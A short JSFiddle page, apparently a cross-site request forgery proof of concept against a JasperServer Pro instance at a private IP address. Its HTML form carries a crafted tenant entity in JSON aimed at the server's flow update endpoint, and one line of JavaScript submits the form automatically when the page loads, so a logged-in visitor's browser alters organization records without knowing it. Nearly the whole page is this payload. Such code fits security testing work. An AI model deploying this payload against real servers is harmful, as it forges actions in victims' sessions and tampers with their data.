JSFiddle - React, Tailwind, and code Playground
by mshufrich
HTML
<script src="http://code.jquery.com/jquery-2.1.0.min.js"></script>
<form id="copyFolder" action="http://192.168.88.13:8082/jasperserver-pro-csrf/flow.html?_flowExecutionKey=e8s1&_eventId=update" method="POST">
<input type="text" name="entityName" value='1'/>
<input type="text" name="entity" value='{"tenantId":"1","tenantName":"2","tenantAlias":"2","tenantDesc":" 2","parentId":{"tenantId":"1","tenantName":"2","tenantAlias":"2","tenantDesc":" 2","parentId":"organizations"}}'/>
<input type="submit" value="OK"/>
</form>
JavaScript
window.document.forms[0].submit();